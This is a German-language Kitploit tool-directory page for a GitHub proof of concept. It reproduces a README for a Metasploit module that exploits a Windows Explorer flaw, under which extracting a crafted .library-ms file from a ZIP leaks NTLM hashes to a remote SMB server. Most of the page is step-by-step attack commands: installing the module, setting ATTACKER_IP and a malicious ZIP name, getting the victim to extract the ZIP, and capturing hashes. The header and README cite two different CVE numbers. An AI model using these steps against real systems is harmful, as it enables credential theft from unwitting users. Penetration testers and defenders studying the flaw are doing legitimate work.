Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-24054 — POC for CVE-2025-24054 | Kitploit
Tools/GitHubGitHub/fomovet/cve-2025-24054
Penetration Testing FrameworksExploit FrameworksPayload GenerationVulnerability AnalysisExploitationCommand and Control
GitHubfomovet/cve-2025-24054

cve-2025-24054

POC for CVE-2025-24054

Repository anzeigen
vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-24071: NTLM-Hash-Leck über .library-ms-Datei (Metasploit-Modul)

Dieses Repository enthält ein Metasploit-Modul, das CVE-2025-24071 ausnutzt, eine Schwachstelle im Windows Explorer, die NTLM-Hashes preisgibt, wenn eine bösartige .library-ms-Datei aus einem ZIP-Archiv extrahiert wird.

Entwickelt von: FOLKS-IWD


Übersicht

Die Schwachstelle tritt auf, wenn ein Benutzer ein ZIP-Archiv extrahiert, das eine speziell gestaltete .library-ms-Datei enthält. Der Windows Explorer initiiert automatisch eine SMB-Authentifizierungsanforderung an einen in der Datei angegebenen Remote-Server und gibt dabei den NTLM-Hash des Benutzers ohne jegliche Benutzerinteraktion preis.

Dieses Metasploit-Modul:

  1. Erzeugt eine bösartige .library-ms-Datei.
  2. Packt sie in ein ZIP-Archiv.
  3. Integriert sich in die SMB-Capture-Funktionalität von Metasploit, um NTLM-Hashes zu sammeln. image

Installation

  1. Klone das Repository:
    root@kitploit:~
    git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
    cd CVE-2025-24071-msfvenom
    
  2. Kopiere das Modul in dein Metasploit-Module-Verzeichnis:
    root@kitploit:~
    cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
    

Verwendung

  1. Lade das Modul:
    root@kitploit:~
    use auxiliary/server/ntlm_hash_leak
    
  2. Setze die erforderlichen Optionen:
    root@kitploit:~
    set ATTACKER_IP 192.168.1.162  # Replace with your IP address
    set FILENAME exploit.zip       # Name of the malicious ZIP file
    set LIBRARY_NAME malicious.library-ms  # Name of the .library-ms file
    set SHARE_NAME shared          # SMB share name
    
  3. Führe das Modul aus :
    root@kitploit:~
    run
    
  4. Das Modul erzeugt eine bösartige ZIP-Datei (exploit.zip). Mache diese Datei verfügbar, damit das Opfer sie herunterladen und extrahieren kann.
  5. Verwende das SMB-Capture-Modul von Metasploit, um NTLM-Hashes zu sammeln:
    root@kitploit:~
    use auxiliary/server/capture/smb
    set SRVHOST 192.168.1.162  # Same as ATTACKER_IP
    run
    
Tool herunterladen